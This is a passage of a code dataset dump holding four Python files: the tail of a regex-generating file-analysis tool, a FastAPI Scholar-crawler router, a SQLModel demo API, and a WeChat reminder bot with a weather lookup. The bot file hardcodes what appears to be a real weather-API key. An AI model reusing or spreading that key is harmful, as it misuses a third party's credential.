regexStr = regexStr + \"]\"\r\n\r\n #print( regexStr )\r\n #print( index, len(list(posSet[index])) )\r\n if not badRegexStr:\r\n #print( regexStr )\r\n self.regStrList.append(regexStr)\r\n\r\n def GenerateRegexReport(self):\r\n self.Update()\r\n self.GenerateRegStrList() \r\n\r\n #check if postitive files exist\r\n for x in list(self.corpusFiles):\r\n if not isfile(self.corpusFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusFiles[x].fullName )\r\n exit(-1)\r\n #check if negative files exist\r\n for x in list(self.corpusNegFiles):\r\n if not isfile(self.corpusNegFiles[x].fullName):\r\n print(\"ERROR: File no longer exists: \" + self.corpusNegFiles[x].fullName )\r\n exit(-1)\r\n\r\n regStr = {self.window : [] }\r\n reportText = []\r\n reportText.append(\"################ Begin Scope Size:\" + str(self.window) + \" ################\")\r\n reportText.append(\"###### Begin Pre-Prune Test ######\")\r\n posResults = {}\r\n posHits = {}\r\n negResults = {}\r\n negHits = {}\r\n badSet = []\r\n posScore = 0\r\n negScore = 0\r\n reportText.append(\"# Number of regStr in regStrList before pruning: \" + str(len(self.regStrList)))\r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n \r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(posResults):\r\n posResults[num] = patternScore\r\n else:\r\n posResults[num] = posResults[num] + patternScore\r\n if num not in list(posHits):\r\n posHits[num] = 1\r\n else:\r\n posHits[num] = posHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n posScore = posScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n if num not in list(negResults):\r\n negResults[num] = patternScore\r\n else:\r\n negResults[num] = negResults[num] + patternScore\r\n if num not in list(negHits):\r\n negHits[num] = 1\r\n else:\r\n negHits[num] = negHits[num] + 1\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n negScore = negScore + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Pre-Prune Test ######\")\r\n\r\n num = 0\r\n if posScore == 0:\r\n reportText.append(\"# Zero hits in the positive files for the regStr generated for this scope. Try again with a smaller scope value.\") \r\n else:\r\n hitTF = {}\r\n #Prune weak regStr \r\n while num < len(self.regStrList):\r\n posTF = posResults[num] / posScore\r\n if negScore != 0:\r\n negTF = negResults[num] / negScore\r\n else:\r\n negTF = 0\r\n \r\n if negScore != 0 and posTF <= negTF:\r\n badSet.append(num)\r\n elif negScore != 0 and posResults[num] <= negResults[num]:\r\n badSet.append(num)\r\n else:\r\n #Prune longer regStr that have same performance as a shorter regStr \r\n if posTF in list(hitTF):\r\n if len(self.regStrList[hitTF[posTF]]) > len(self.regStrList[num]):\r\n badSet.append(hitTF[posTF])\r\n hitTF[posTF] = num\r\n else:\r\n badSet.append(num)\r\n else:\r\n hitTF[posTF] = num\r\n num = num + 1\r\n\r\n reportText.append(\"###### Begin Post-Prune Test ######\")\r\n reportText.append(\"# Number of regStr in regStrList after pruning: \" + str(len(self.regStrList) - len(badSet)))\r\n \r\n for x in list(self.corpusFiles):\r\n fullName = self.corpusFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n\r\n for x in list(self.corpusNegFiles):\r\n fullName = self.corpusNegFiles[x].fullName\r\n reportText.append( \"### Begin File: \" + fullName )\r\n f = io.open(fullName, mode=\"r\", encoding=\"utf-8\")\r\n text = f.read()\r\n num = 0\r\n score = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n pattern = re.compile(self.regStrList[num])\r\n patternScore = len(re.findall(pattern, text))\r\n reportText.append( \"# regStr Score: \" + str(patternScore) + \" regStr: \" + self.regStrList[num] )\r\n score = score + patternScore\r\n num = num + 1\r\n reportText.append( \"# Overall Score: \" + str(score) )\r\n reportText.append( \"### End File: \" + fullName )\r\n reportText.append(\"###### End Post-Prune Test ######\")\r\n reportText.append(\"################ End Scope Size:\" + str(self.window) + \" ################\")\r\n \r\n num = 0\r\n while num < len(self.regStrList):\r\n if num not in badSet:\r\n regStr[self.window].append(self.regStrList[num])\r\n num = num + 1\r\n return regStr, reportText\r\n\r\n\r\n\r\nclass File:\r\n def __init__(self, sha256, name):\r\n self.sha256 = sha256\r\n self.fullName = name\r\n self.terms = {}\r\n\r\n def __eq__(self, other):\r\n return self.sha256 == other.sha256\r\n \r\n\r\n\r\nclass Term:\r\n def __init__(self, Value ):\r\n self.Value = Value\r\n self.Neighbors = []\r\n self.Count = 1\r\n self.UniHex = str(\"\\\\\\\\\") + \"x{\" + str(format( ord(Value), '04x')) +\"}\"\r\n \r\n def __eq__(self, other):\r\n return self.Value == other.Value\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-p', '--positive', type=str, help='Directory containing files for the Positive set (what you want to detect)', required=True)\r\n parser.add_argument('-n', '--negative', type=str, help='Directory containing files for the Negative set (what you *dont* want to detect)', default=\"\")\r\n parser.add_argument('-o', '--output', type=str, help='Output file name, where the training report and results will be sent. Appends output if file exists already.', required=True)\r\n parser.add_argument('-s', '--scope', type=int, help='Number of characters included before AND after the key character. A higher number in scope will increase RAM usage! Defaults to 3', default=3)\r\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", help=\"After first run, decrement the scope and re-run until scope is zero\")\r\n parser.add_argument(\"-d\", \"--detail\", action=\"store_true\", help=\"Increase report output details, shows per regStr per file scores, file total scores, and results from before AND after pruning\")\r\n parser.add_argument(\"-f\", \"--force\", action=\"store_true\", help=\"Force proceed when -s/--scope is greater than 5\")\r\n args = parser.parse_args()\r\n\r\n #Validate supplied args\r\n if not isdir(args.positive):\r\n print(\"ERROR: Directory does not exist : \" + args.positive )\r\n exit(-1)\r\n if args.negative != \"\" and not isdir(args.negative):\r\n print(\"ERROR: Directory does not exist : \" + args.negative )\r\n exit(-1)\r\n if not args.force and args.scope > 5 :\r\n print(\"WARNING: scope is greater than 5 which will use more RAM, add -f/--force flag to proceed\")\r\n exit(-2)\r\n if args.scope <= 0 :\r\n print(\"ERROR: scope is less than 1. Scope needs to be between 1 and 5, if greater than 5 add -f/--force flag to proceed\")\r\n exit(-1)\r\n\r\n outputFile = open(args.output,\"a+\")\r\n \r\n\r\n #Create a new RegexReport for this run\r\n newReport = RegexReport()\r\n \r\n\r\n if args.rerun:\r\n runNum = args.scope\r\n minNum = 1\r\n else:\r\n runNum = args.scope\r\n minNum = args.scope\r\n \r\n while( runNum >= minNum ):\r\n #start with supplied window scope \r\n NewCorpus = Corpus(runNum)\r\n\r\n mypath = args.positive\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddPosFile(fullName)\r\n \r\n if args.negative != \"\":\r\n mypath = args.negative\r\n onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]\r\n for fullName in onlyfiles:\r\n fullName = mypath + fullName\r\n NewCorpus.AddNegFile(fullName)\r\n \r\n curReport = NewCorpus.GenerateRegexReport()\r\n \r\n for x in curReport[1]:\r\n newReport.reportText.append(x)\r\n newReport.regStr[NewCorpus.window] = curReport[0][NewCorpus.window]\r\n \r\n runNum = runNum - 1\r\n\r\n #Write Report\r\n if args.detail:\r\n for line in newReport.reportText:\r\n outputFile.write(line + \"\\n\")\r\n outputFile.write(\"############ Begin RegStr Output ############\\n\")\r\n for x in list(newReport.regStr):\r\n outputFile.write(\"###### Begin Scope Output: \" + str(x) + \" ######\\n\")\r\n for y in newReport.regStr[x]:\r\n outputFile.write(y + \"\\n\")\r\n outputFile.write(\"###### End Scope Output: \" + str(x) + \" ######\\n\") \r\n outputFile.write(\"############ End RegStr Output ############\\n\")\r\n\r\n\r\n\r\n\r\n", "repo_name": "infosecsmith/file-analysis", "sub_path": "RegexGenerator.py", "file_name": "RegexGenerator.py", "file_ext": "py", "file_size_in_byte": 20611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "hashlib.sha256", "line_number": 57, "usage_type": "call"}, {"api_name": "io.open", "line_number": 58, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 98, "usage_type": "call"}, {"api_name": "io.open", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 214, "usage_type": "call"}, {"api_name": "io.open", "line_number": 234, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 239, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 240, "usage_type": "call"}, {"api_name": "io.open", "line_number": 259, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 264, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 265, "usage_type": "call"}, {"api_name": "io.open", "line_number": 317, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 323, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 324, "usage_type": "call"}, {"api_name": "io.open", "line_number": 334, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 340, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 341, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 382, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 393, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 396, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 425, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 425, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 432, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 432, "usage_type": "call"}]}
+{"seq_id": "3718275408", "text": "from fastapi import APIRouter, Depends, status\nfrom fastapi.exceptions import HTTPException\nfrom fastapi_jwt_auth import AuthJWT\nfrom schema.api_schema import crawlInput\nfrom crawler.crawler import dyn_crawl\nfrom db.database import Session, engine\nfrom db.models import History\nimport datetime\n\n\n# create db session \nsession = Session(bind=engine)\n\n\n# creatte crawler router instance for web crawler\ncrawler_router = APIRouter(\n prefix='/crawl',\n tags=['CRAWL']\n)\n\n# crawl route\n@crawler_router.get('/crawl' ,status_code=status.HTTP_200_OK)\nasync def crawl(crawl_values: crawlInput, Authorize: AuthJWT=Depends()): \n \n \"\"\"\n ## crawl google scholar \n This requires the following\n ```\n keyword:str\n no_of_article:int\n allow_links:bool\n allow_authors:bool\n allow_summary:bool\n ```\n It also requires an access token from login.\n \"\"\"\n \n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n\n # crawl google scholar with user defined requirements\n result = dyn_crawl(keyword=crawl_values.keyword, no_articles=int(crawl_values.no_of_article),\n links=crawl_values.allow_links, author=crawl_values.allow_authors, \n summary=crawl_values.allow_summary)\n \n current_user = Authorize.get_jwt_subject()\n \n # record user crawler history to db\n new_history=History(\n username=current_user,\n keyword=crawl_values.keyword,\n date=datetime.datetime.now(datetime.timezone.utc)\n )\n session.add(new_history)\n\n session.commit()\n return {\"result\": result }\n \n\n# history route \n@crawler_router.get('/history' ,status_code=status.HTTP_200_OK)\nasync def history(Authorize: AuthJWT=Depends()): \n\n \"\"\"\n ## user crawl history\n This queries a users crawl history from database. It requires a access token from login.\n \"\"\"\n try:\n # request access token from authorized user\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED, \n detail='unauthorized token')\n \n current_user = Authorize.get_jwt_subject()\n\n # query db for specific user's crawler history\n hist_data = session.query(History.date, History.keyword).filter(History.username == current_user).all()\n\n return {f\"history data for {current_user}\": hist_data}\n \n\n", "repo_name": "Bee0933/scholar-api", "sub_path": "api/crawl_routes.py", "file_name": "crawl_routes.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.database.Session", "line_number": 12, "usage_type": "call"}, {"api_name": "db.database.engine", "line_number": 12, "usage_type": "name"}, {"api_name": "fastapi.APIRouter", "line_number": 16, "usage_type": "call"}, {"api_name": "schema.api_schema.crawlInput", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 23, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 23, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 43, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 43, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 43, "usage_type": "name"}, {"api_name": "crawler.crawler.dyn_crawl", "line_number": 47, "usage_type": "call"}, {"api_name": "db.models.History", "line_number": 54, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 57, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 57, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 57, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 22, "usage_type": "name"}, {"api_name": "fastapi_jwt_auth.AuthJWT", "line_number": 67, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.exceptions.HTTPException", "line_number": 78, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_401_UNAUTHORIZED", "line_number": 78, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 78, "usage_type": "name"}, {"api_name": "db.models.History.date", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History", "line_number": 84, "usage_type": "name"}, {"api_name": "db.models.History.keyword", "line_number": 84, "usage_type": "attribute"}, {"api_name": "db.models.History.username", "line_number": 84, "usage_type": "attribute"}, {"api_name": "fastapi.status.HTTP_200_OK", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 66, "usage_type": "name"}]}
+{"seq_id": "42052405544", "text": "from pydantic import BaseModel\nfrom typing import List, Optional\nimport uvicorn\nfrom fastapi import FastAPI\nfrom sqlmodel import Field, Session, SQLModel, create_engine, select\nfrom models.hero import Hero\nfrom models.team import Team\n\n# from sqlmodel.orm import join\n\nsqlite_file_name = \"database.db\"\nsqlite_url = f\"sqlite:///{sqlite_file_name}\"\n\nengine = create_engine(sqlite_url, echo=True, connect_args={\"check_same_thread\": False})\n\n\ndef create_db_and_tables():\n SQLModel.metadata.create_all(engine)\n\n\nclass TeamDto(BaseModel):\n name: str\n headquarters: str\n heroes: List[Hero]\n\nclass HeroDto(BaseModel):\n name: str\n secret_name: str\n age: int\n team_id: int\n\n\n\n\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def table_all():\n create_db_and_tables()\n\n\n@app.get(\"/\")\ndef Hello():\n return \"Hello\"\n\n\n@app.get(\"/team\", response_model=List[Team])\nasync def getAllTeam():\n db = Session(engine)\n query = db.query(Team).join(Hero).all()\n\n response = {\n \"status\": 'success',\n \"data\": query\n } \n\n return query\n\n\n\n@app.get(\"/heroes\")\nasync def getAllHeroes():\n db = Session(engine)\n query= select(Hero, Team).join(Team)\n\n heroes = db.exec(query).all()\n\n return {\"heroes\": heroes}\n\n\n@app.post(\"/team\")\nasync def createTeam(team: TeamDto):\n db = Session(engine)\n db_team = Team(\n name=team.name,\n headquarters=team.headquarters\n )\n\n \n\n db.add(db_team)\n\n db.commit()\n\n response = {\n \"status\": \"success\"\n }\n\n return response\n\n\n@app.post(\"/heroes\")\nasync def createHeroes(hero: HeroDto):\n db = Session(engine)\n\n db_heroes = Hero(\n name=hero.name,\n secret_name=hero.secret_name,\n age=hero.age,\n team_id=hero.team_id\n )\n\n db.add(db_heroes)\n db.commit()\n\n response = {\n \"status\": \"Success\"\n }\n\n return response\n\n \n \nif __name__ == \"__main__\":\n uvicorn.run(\"main:app\", reload=True)\n\n\n", "repo_name": "renaldyhidayatt/simplejoinSqlModel", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlmodel.create_engine", "line_number": 14, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata.create_all", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "models.hero.Hero", "line_number": 24, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 26, "usage_type": "name"}, {"api_name": "fastapi.FastAPI", "line_number": 37, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 52, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 53, "usage_type": "argument"}, {"api_name": "models.team.Team", "line_number": 53, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 50, "usage_type": "name"}, {"api_name": "models.team.Team", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlmodel.Session", "line_number": 66, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.select", "line_number": 67, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 67, "usage_type": "argument"}, {"api_name": "sqlmodel.Session", "line_number": 76, "usage_type": "call"}, {"api_name": "models.team.Team", "line_number": 77, "usage_type": "call"}, {"api_name": "sqlmodel.Session", "line_number": 97, "usage_type": "call"}, {"api_name": "models.hero.Hero", "line_number": 99, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "16480670949", "text": "# encoding: utf-8\n\nimport _thread\nfrom datetime import datetime\n\nimport itchat, time\nimport requests\nfrom itchat.content import *\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n# 自动登陆,命令行二维码,退出程序后暂存登陆状态\nfrom DateUtil import get_week_day\n\ntimes = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\nitchat.auto_login(enableCmdQR=2, hotReload=True)\n\n# 获取指定好友\ncarling = itchat.search_friends(nickName='Carling')[0]['UserName']\nbiu = itchat.search_friends(nickName='Biu')[0]['UserName']\nalpha_meow = itchat.search_chatrooms(name='阿尔法猫')[0]['UserName']\n\nsched = BlockingScheduler()\n\n\n# 阿尔法猫本体\ndef meow(threadName, delay):\n print('meow方法启动')\n\n # 监听普通消息\n @itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING])\n def text_reply(msg):\n print('普通消息:')\n print(msg)\n\n # 监听群聊事件\n @itchat.msg_register(TEXT, isGroupChat=True)\n def text_reply(msg):\n print('群组:')\n print(msg)\n if msg['isAt']:\n text = msg['Text']\n act_name = msg['ActualNickName']\n if str(text).find('提醒') > 0:\n new_jobs(sched, text, act_name)\n elif str(text).find('天气') > 0:\n weather(text)\n\n # itchat.send_msg(notice, toUserName=biu)\n # 保持登陆状态\n itchat.run()\n\n\ndef jobs(threadName, delay):\n print('jobs方法启动')\n # 添加任务\n # day_of_week = 'mon-fri' 表示从周一到周五\n # 订餐 - 每周六12点、21点提醒我订一星期的饭\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=12, minute=00)\n sched.add_job(func=job_ordering, trigger='cron', day_of_week='sat', hour=21, minute=00)\n # 午餐\n sched.add_job(func=job_have_lunch, trigger='cron', day_of_week='mon-fri', hour=11, minute=45)\n # 午睡 - 每天中午12点45分提醒我睡觉\n sched.add_job(func=job_siesta, trigger='cron', day_of_week='mon-fri', hour=12, minute=45)\n # 种树 - 每天七点半提醒我收能量\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=7, minute=30)\n # 下班\n sched.add_job(func=job_plant_trees, trigger='cron', day_of_week='mon-fri', hour=17, minute=55)\n # 喂鸡 - 每隔4小时提醒我喂鸡\n sched.add_job(func=job_siesta, trigger='interval', hours=4, minutes=30)\n # 休息\n sched.add_job(func=job_rest, trigger='interval', minutes=30)\n sched.start()\n\n\n# 午餐\ndef job_have_lunch():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点吃饭啦\\n'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 订餐提醒定时器\ndef job_ordering():\n ordering_url = 'http://hy.dmeiwei.com/wx/wxgetcodeurl_dczx.asp'\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:小嘉琳记得公司订餐呐\\n' \\\n '链接是:\\n' + ordering_url + '\\n请现在立刻马上行动起来!'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 午睡提醒器\ndef job_siesta():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:已经到午休时间啦,你们快点去睡觉觉/睡'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 种树\ndef job_plant_trees():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:快去支付宝收能量啦,不然要被偷走了'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 喂鸡提醒器\ndef job_feeding_chickens():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:要去看看鸡仔饿了没有哦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 下班\ndef job_off_duty():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:到点下班回家撸猫啦'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 休息\ndef job_rest():\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:别太忙了,要起来走走动动,喝杯水,休息一下。'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 新建提醒\ndef new_jobs(sched, text, act_name):\n arr = text.split('/')\n date_format = arr[1]\n date = arr[2]\n obj = arr[4]\n todo = arr[-1]\n\n itchat.send_msg('阿尔法猫已经收到信息了,新建了一个任务\\n时间是:' + date + \"\\n任务内容是:\" + todo, toUserName=alpha_meow)\n\n if date_format == 'longtime':\n t_struct = time.strptime(date, \"%Y-%m-%d %H:%M:%S\")\n sched.add_job(func=job_notice, trigger='date',\n run_date=datetime(t_struct.tm_year, t_struct.tm_mon, t_struct.tm_mday,\n t_struct.tm_hour, t_struct.tm_min, t_struct.tm_sec),\n args=[obj, act_name, todo])\n\n\ndef job_notice(obj='我', act_name=None, todo=None):\n if obj == '我':\n obj = act_name\n\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n阿尔法猫提醒你:' + todo + '\\n @' + obj + ' '\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\ndef weather(msg):\n arr = msg.split('/')\n if len(arr) > 1:\n location = arr[1]\n if location == '今天':\n location = '广州'\n\n args = {'location': location, 'key': '12d04dfd2f514c158f6b69291225576e'}\n res = requests.get(\"https://free-api.heweather.net/s6/weather/now\", params=args)\n if res.status_code == 200:\n result = res.json()\n # 体感温度,默认单位:摄氏度\n fl = result['HeWeather6'][0].get('now')['fl']\n # 温度,默认单位:摄氏度\n tmp = result['HeWeather6'][0].get('now')['tmp']\n # 实况天气状况描述\n cond_txt = result['HeWeather6'][0].get('now')['cond_txt']\n\n if int(fl) <= 20:\n remind = '记得多穿点衣服哦'\n elif int(fl) >= 28:\n remind = '记得多补水,注意防晒'\n else:\n remind = '要开开心心的呢'\n\n notice = '现在是北京时间:' + times + \" \" + get_week_day(datetime.now()) \\\n + '\\n' + location + '天气:' + cond_txt + \",气温:\" + tmp + \"°C,体感温度:\" + fl + '°C' \\\n + '\\n阿尔法猫提醒你:' + remind\n itchat.send_msg(notice, toUserName=alpha_meow)\n else:\n notice = '天气预报异常啦,Biubiu快去看看'\n itchat.send_msg(notice, toUserName=alpha_meow)\n\n\n# 创建两个线程\ntry:\n _thread.start_new_thread(meow, (\"Thread-1\", 2,))\n _thread.start_new_thread(jobs, (\"Thread-2\", 4,))\nexcept:\n print(\"Error: unable to start thread\")\n\nwhile 1:\n pass\n\n# 文件传输助手\n# itchat.send('hello world', toUserName='filehelper')\n", "repo_name": "biuhe/wechat-robot", "sub_path": "login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 7247, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.strftime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 14, "usage_type": "call"}, {"api_name": "time.time", "line_number": 14, "usage_type": "call"}, {"api_name": "itchat.auto_login", "line_number": 16, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 19, "usage_type": "call"}, {"api_name": "itchat.search_friends", "line_number": 20, "usage_type": "call"}, {"api_name": "itchat.search_chatrooms", "line_number": 21, "usage_type": "call"}, {"api_name": "apscheduler.schedulers.blocking.BlockingScheduler", "line_number": 23, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 31, "usage_type": "call"}, {"api_name": "itchat.msg_register", "line_number": 37, "usage_type": "call"}, {"api_name": "itchat.run", "line_number": 51, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 78, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 80, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 89, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 94, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 94, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 96, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 103, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 108, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 110, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 115, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 115, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 117, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 122, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 122, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 124, "usage_type": "call"}, {"api_name": "itchat.send_msg", "line_number": 135, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 138, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 140, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 149, "usage_type": "name"}, {"api_name": "itchat.send_msg", "line_number": 151, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 162, "usage_type": "call"}, {"api_name": "DateUtil.get_week_day", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 